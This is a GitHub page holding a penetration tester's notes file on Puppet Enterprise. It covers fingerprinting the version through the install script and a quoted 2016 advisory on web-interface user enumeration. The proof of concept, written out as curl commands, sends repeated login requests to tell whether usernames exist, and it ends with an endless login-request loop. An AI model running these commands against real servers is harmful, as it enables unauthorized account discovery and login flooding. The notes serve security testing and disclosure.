-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathpuppet.txt
38 lines (26 loc) · 1.42 KB
/
puppet.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
* Get version via install script (port may differ)
curl -sk https://<host>:8140/packages/current/install.bash | grep 'Puppet'
...
fail "$(uname -s) is not a supported platform for Puppet Enterprise v3.8.0
------------------------------------------------------------------------------------------
Puppet Enterprise Web Interface User Enumeration
https://seclists.org/bugtraq/2016/Oct/48
Vendor Acknowledgement: August 23, 2016
Vendor Releases Version: 2016.4.0
October 17, 2016 : Public Disclosure
Details:
=====================
By sending remote HTTP request to Puppet Enterprise Web Interface it is possible to enumerate valid user account names by sending
more than 10 requests. If user does not exist we will continue to get 'Authentication failed.' HTTP response from the victim server.
However, if the user does exist we will no longer receive such a message confirming the user exists.
PoC:
================
* Verified/Tested on v3.8.0:
Send login request 11 times, after 10 we will know if user exists or not.
FOR /l %i in (1,1,11) DO curl -k https://victim-puppet-server/auth/login?redirect=Enum-Users -d username=IDONTEXIST -d password=1
HTTP 200 OK
'Authentication failed.'
FOR /l %i in (1,1,11) DO curl -k https://victim-puppet-server/auth/login?redirect=Enum-Users -d username=BOZO -d password=1
HTTP 200 OK
----
while [ 1 ]; do curl -k https://<host>/auth/login?redirect=bla -d username=<username> -d password=1; done